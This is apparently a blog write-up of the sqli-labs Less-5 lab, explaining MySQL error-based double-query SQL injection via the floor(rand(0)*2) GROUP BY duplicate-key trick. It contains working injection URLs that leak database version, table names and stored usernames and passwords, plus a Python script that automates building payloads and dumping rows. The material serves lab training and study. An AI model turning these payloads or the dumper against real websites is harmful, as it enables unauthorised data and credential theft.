sqli-labs Less-5

Less-5 GET - Double Injection - Single Quotes - String

1. The original page
[screenshot]
2. ?id=1
[screenshot]
With a valid id the page does not echo the rows it fetched; it only prints "You are in...........". Union-based output is therefore useless here, so the plan is to make the query fail and carry the information we want inside the error message.

3. ?id=1'
[screenshot]
MySQL reports a syntax error near '1'' LIMIT 0,1'. The outer quotes belong to the error message itself; remove them and what remains is 1' LIMIT 0,1. Since our input was 1', the query must wrap the id in single quotes, i.e. the fragment around our input looks like 'input' LIMIT 0,1.

SQL (the shape of the back-end query as recovered from the error; the column list is not visible, and the later steps show the table is security.users):
SELECT ... FROM users WHERE id='input' LIMIT 0,1;

4. A double query is one query nested inside another: select ... (select ...). The inner one is the subquery; it runs first and its result is handed to the outer select. When the subquery succeeds but the outer query fails, concat() (the string concatenation function) can glue the subquery's result into the value that the error message reports back to us.

Double injection relies on four pieces:

  1. rand(): returns a pseudo-random float in the range [0,1); rand(0) uses a fixed seed, so it returns the same sequence on every call
  2. floor(a): rounds a down to the nearest integer, so floor(rand(0)*2) is always either 0 or 1
  3. count(*): aggregate function, counts the rows that fall into each group
  4. group by: groups the result rows by the value of an expression

The underlying principle:
SELECT count(*) FROM table GROUP BY floor(rand(0)*2);

floor(rand(0)*2) is not truly random. With the fixed seed 0 it is a pseudo-random sequence that is the same every time and starts 0 1 1 0 1 1 ...

Execution: while grouping, MySQL builds a temporary table keyed by the group-by expression. For each source row it evaluates the key and looks it up; if the key is not yet present, the row is inserted, and the key expression is evaluated a second time for that insert. The second evaluation can differ from the first, and that is the whole trick.

First source row: the key evaluates to 0, which is not in the temporary table, so MySQL inserts a row; during the insert the key is evaluated again and now gives 1. The temporary table holds key 1 with count 1.
[screenshot]
Second source row: the key evaluates to 1. Key 1 already exists, so its count is simply incremented to 2.
[screenshot]
Third source row: the key evaluates to 0 (the fourth value of the sequence). 0 is not in the table, so MySQL tries to insert it, evaluating the key once more and getting 1 (the fifth value). Key 1 already exists and the insert fails with "Duplicate entry '1' for key 'group_key'".

So floor(rand(0)*2) is evaluated 5 times and the error is guaranteed as soon as the FROM table yields at least 3 rows, which is why information_schema.tables is a convenient table to group over.
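To make the mechanism above concrete, here is an added example (my own, not code from the original post or from sqli-labs) that models MySQL's two evaluations of the group key in Python. The rand(0) bit sequence is hard-coded from its known fixed-seed output, the temporary-table behaviour is an assumption taken from the explanation above rather than a MySQL implementation, and the unseeded simulation uses a fixed Python seed only so that the demo is reproducible.

```python
import random

# First values of floor(rand(0)*2) as MySQL produces them for the fixed seed 0.
# Hard-coded here (constructed input); the page's own walk-through uses the
# first five of them: 0 1 1 0 1.
RAND0_BITS = [0, 1, 1, 0, 1, 1, 1, 0, 0, 1, 1, 1]


def simulate_group_by(bits, rows, leak=""):
    """Model GROUP BY concat(leak, floor(rand(0)*2)) over `rows` source rows.

    Assumed MySQL behaviour (as described in the post): the grouping key is
    evaluated once per source row to look it up in the temporary table; when
    the key is not found, the row is inserted and the key expression is
    evaluated a second time for the insert.  If that second value is already
    present, the insert fails with error 1062 (Duplicate entry).

    Returns (temp_table, evaluations, error_message_or_None).  `bits` must
    hold at least 2 * rows values.
    """
    seq = iter(bits)
    temp_table = {}          # group key -> count(*)
    evaluations = 0

    for _ in range(rows):
        key = leak + str(next(seq))          # evaluation 1: lookup
        evaluations += 1
        if key in temp_table:
            temp_table[key] += 1
            continue
        key = leak + str(next(seq))          # evaluation 2: insert
        evaluations += 1
        if key in temp_table:                # the two evaluations disagreed
            return (temp_table, evaluations,
                    f"Duplicate entry '{key}' for key 'group_key'")
        temp_table[key] = 1
    return temp_table, evaluations, None


def unseeded_error_rate(rows=3, trials=1000, seed=1):
    """Same model with a genuinely random key, i.e. rand() without a seed.

    Returns the fraction of trials that hit Duplicate entry.  It is neither
    0 nor 1, which is why the payload pins the sequence with rand(0).
    """
    rng = random.Random(seed)   # seeded only to keep this demo reproducible
    hits = 0
    for _ in range(trials):
        bits = [rng.randrange(2) for _ in range(2 * rows)]
        if simulate_group_by(bits, rows)[2] is not None:
            hits += 1
    return hits / trials


if __name__ == "__main__":
    # Two source rows: key 1 inserted, then incremented; 3 evaluations, no error.
    print(simulate_group_by(RAND0_BITS, 2))
    # Three source rows: evaluations 4 and 5 give 0 then 1, and 1 already exists.
    print(simulate_group_by(RAND0_BITS, 3))
    # Whatever the subquery produced is part of the key, so it lands in the error.
    print(simulate_group_by(RAND0_BITS, 3, leak="security::"))
    # A key that always evaluates the same never collides, however many rows.
    print(simulate_group_by([0] * 20, 10))
    print(unseeded_error_rate())
```

The `leak` argument is the part of the key that the injection payload fills with a subquery: because the key is rejected as a duplicate, the whole key, subquery result included, is echoed in the error text.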

The basic routine:
SELECT count(*), concat(([subquery goes here]), floor(rand(0)*2)) AS a FROM [table_name] GROUP BY a;
The subquery's result becomes part of the group key, so it is reported verbatim inside the Duplicate entry error.

5. Getting the database information
?id=0' union select 1,count(*),concat((select concat(version(),0x3a,0x3a,database(),0x3a,0x3a,user(),0x3a) limit 0,1),floor(rand(0)*2)) as a from information_schema.tables group by a --+
id=0 matches no row, so only the union part produces output; the union lists three columns (1, count(*) and the concat() expression) to match the original select, and 0x3a is a ':' separator that makes the leaked fields easy to tell apart.
[screenshot]
6. Getting the tables

?id=0' union select 1,count(*),concat((select concat(table_name,0x3a,0x3a) from information_schema.tables where table_schema=database()),floor(rand(0)*2)) as a from information_schema.tables group by a --+
[screenshot]
Nothing is leaked because the subquery returns more than one row and MySQL rejects it ("Subquery returns more than 1 row"): a subquery used inside concat() must yield exactly one row, so add a limit:

?id=0' union select 1,count(*),concat((select concat(table_name,0x3a,0x3a) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2)) as a from information_schema.tables group by a --+
[screenshot]
To see the other tables, step the limit offset:

?id=0' union select 1,count(*),concat((select concat(table_name,0x3a,0x3a) from information_schema.tables where table_schema=database() limit 1,1),floor(rand(0)*2)) as a from information_schema.tables group by a --+

[screenshot]
7. Getting the user information

?id=0' union select 1,count(*),concat((select concat(username,0x3a,0x3a,password,0x3a,0x3a) from security.users limit 1,1),floor(rand(0)*2)) as a from information_schema.tables group by a --+

[screenshot]
Change the limit offset again to walk through the rows of security.users:
?id=0' union select 1,count(*),concat((select concat(username,0x3a,0x3a,password,0x3a,0x3a) from security.users limit 3,1),floor(rand(0)*2)) as a from information_schema.tables group by a --+
[screenshot]
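Steps 5 to 7 are the same payload with a different subquery and a different limit offset each time, which is tedious by hand. The following is an added example (my own helper, not code from the original post or from sqli-labs) that builds those payloads, parses the leaked value out of the Duplicate entry message, and walks the offset until the error stops appearing. The target URL is an assumption about a local lab, and the sample responses are constructed to imitate the sqli-labs error page, not captured from a server.

```python
import re
import urllib.request
from urllib.parse import quote

# Assumed location of a local sqli-labs install; adjust to your own lab.
BASE_URL = "http://127.0.0.1/sqli-labs/Less-5/?id="

# The double-query skeleton from the post; {sub} must return exactly one row.
TEMPLATE = (
    "0' union select 1,count(*),concat(({sub}),floor(rand(0)*2)) as a "
    "from information_schema.tables group by a --+"
)

# Subqueries used in steps 5-7.  0x3a is ':' and doubles as a field separator.
SUBQUERIES = {
    "banner": "select concat(version(),0x3a,0x3a,database(),0x3a,0x3a,user(),0x3a) limit 0,1",
    "tables": ("select concat(table_name,0x3a,0x3a) from information_schema.tables "
               "where table_schema=database() limit {off},1"),
    "users": ("select concat(username,0x3a,0x3a,password,0x3a,0x3a) "
              "from security.users limit {off},1"),
}

DUP_RE = re.compile(r"Duplicate entry '(.*?)' for key '")
MANY_ROWS = "Subquery returns more than 1 row"


def build_payload(kind, offset=0):
    """Raw (unencoded) value of the id parameter for one of SUBQUERIES."""
    return TEMPLATE.format(sub=SUBQUERIES[kind].format(off=offset))


def build_url(kind, offset=0):
    """Full GET URL.  '+' is left unencoded so the server decodes it as the
    space that the '-- ' comment needs; everything else is percent-encoded."""
    return BASE_URL + quote(build_payload(kind, offset), safe="+")


def needs_limit(html):
    """True when MySQL refused a multi-row subquery: tighten LIMIT off,1."""
    return MANY_ROWS in html


def extract_leak(html):
    """Pull the smuggled value out of the Duplicate entry message.

    The group key is <subquery result><0 or 1>, so the trailing digit that
    floor(rand(0)*2) appended is stripped.  Returns None when the page shows
    no duplicate-key error, e.g. once LIMIT has stepped past the last row
    (the subquery is then NULL, concat() is NULL, and no collision occurs).
    """
    if needs_limit(html):
        raise ValueError("subquery returned several rows; use LIMIT n,1")
    m = DUP_RE.search(html)
    return None if m is None else m.group(1)[:-1]


def dump(kind, fetch, max_rows=50):
    """Walk LIMIT off,1 upwards with `fetch(url) -> html` until nothing leaks."""
    rows = []
    for off in range(max_rows):
        leaked = extract_leak(fetch(build_url(kind, off)))
        if leaked is None:
            break
        rows.append(leaked)
    return rows


def http_fetch(url):
    """Real fetch for a lab box; never called by the offline demo below."""
    with urllib.request.urlopen(url, timeout=10) as resp:
        return resp.read().decode(errors="replace")


# Constructed responses imitating the sqli-labs error page, keyed by offset.
FAKE_TABLE_PAGES = {
    0: "<font color='#FFFF00'>Duplicate entry 'emails::1' for key 'group_key'</font>",
    1: "<font color='#FFFF00'>Duplicate entry 'referers::1' for key 'group_key'</font>",
    2: "<font color='#FFFF00'>You are in...........</font>",
}


def fake_fetch(url):
    """Offline stand-in for http_fetch that serves FAKE_TABLE_PAGES."""
    off = int(re.search(r"limit%20(\d+)%2C1", url).group(1))
    return FAKE_TABLE_PAGES.get(off, FAKE_TABLE_PAGES[2])


if __name__ == "__main__":
    print(build_url("banner"))
    print(dump("tables", fake_fetch))       # swap in http_fetch against a lab
```

Against a real lab, pass `http_fetch` to `dump()`; `needs_limit()` is there because the "Subquery returns more than 1 row" failure from step 6 looks, to a naive parser, just like the end of the table.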

This is just my own understanding of the method; if I have misunderstood something or described it incorrectly, please correct me.


Source: blog.csdn.net/qq_42630215/article/details/104700359